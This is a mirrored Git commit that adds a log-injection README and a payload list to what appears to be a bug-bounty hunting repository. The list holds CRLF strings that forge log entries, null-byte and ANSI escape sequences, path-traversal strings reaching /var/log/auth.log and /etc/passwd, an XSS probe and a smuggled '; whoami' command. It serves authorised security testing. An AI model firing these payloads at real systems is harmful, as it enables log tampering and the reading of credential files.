mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
Restructure repository: Remove OWASP categorization, organize by vulnerability type
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
@@ -0,0 +1,23 @@
|
||||
# Log Injection
|
||||
|
||||
## Description
|
||||
Log injection vulnerabilities occur when an application includes untrusted data in log files without proper validation or encoding. Attackers can exploit this to forge log entries, inject malicious content into logs, or hide their activities by manipulating log data.
|
||||
|
||||
## Common Attack Vectors
|
||||
- User input fields that get logged
|
||||
- HTTP headers
|
||||
- Error messages
|
||||
- Authentication attempts
|
||||
- Application events
|
||||
|
||||
## Common Techniques
|
||||
- CRLF injection to create fake log entries
|
||||
- Log forging
|
||||
- Log poisoning
|
||||
- Log file pollution
|
||||
|
||||
## Testing Approach
|
||||
Submit special characters and control sequences in input fields that are logged to test for log injection vulnerabilities.
|
||||
|
||||
## Payloads
|
||||
See `log-injection-payloads.txt` for a comprehensive list of log injection payloads.
|
||||
@@ -0,0 +1,51 @@
|
||||
# Log Injection Payloads
|
||||
|
||||
# CRLF injection in logs
|
||||
\r\n
|
||||
\r\nUser: admin logged in successfully
|
||||
%0d%0a
|
||||
%0d%0aAuthentication successful for admin
|
||||
|
||||
# Log poisoning
|
||||
\nuser=admin authenticated=true\n
|
||||
\r\nSUCCESS: Admin login\r\n
|
||||
%0auser:admin%0astatus:success%0a
|
||||
|
||||
# Log format manipulation
|
||||
admin\nAuthenticated:true
|
||||
test\r\nRole:administrator
|
||||
|
||||
# Time-based log injection
|
||||
[2023-01-01 00:00:00] User admin logged in successfully
|
||||
[CRITICAL] Unauthorized access detected
|
||||
|
||||
# Null byte injection in logs
|
||||
admin\x00
|
||||
user\x00admin
|
||||
|
||||
# ANSI escape sequences (log injection)
|
||||
\x1b[31mCRITICAL\x1b[0m
|
||||
\033[1;31mALERT\033[0m
|
||||
|
||||
# Log file path traversal
|
||||
../../logs/application.log
|
||||
/var/log/auth.log
|
||||
../../../var/log/syslog
|
||||
|
||||
# Events to test if they appear in logs
|
||||
# Try these payloads and verify they are logged appropriately:
|
||||
# - Failed login attempts
|
||||
# - Successful login
|
||||
# - Password changes
|
||||
# - Privilege escalation attempts
|
||||
# - Administrative actions
|
||||
# - Access to sensitive data
|
||||
# - Invalid input
|
||||
# - Authentication failures
|
||||
# - Authorization failures
|
||||
|
||||
# Sample payloads to check logging behavior
|
||||
SELECT * FROM users WHERE username='admin' AND password='wrong'
|
||||
<script>alert('XSS')</script>
|
||||
../../../etc/passwd
|
||||
; whoami
|
||||
Reference in New Issue
Block a user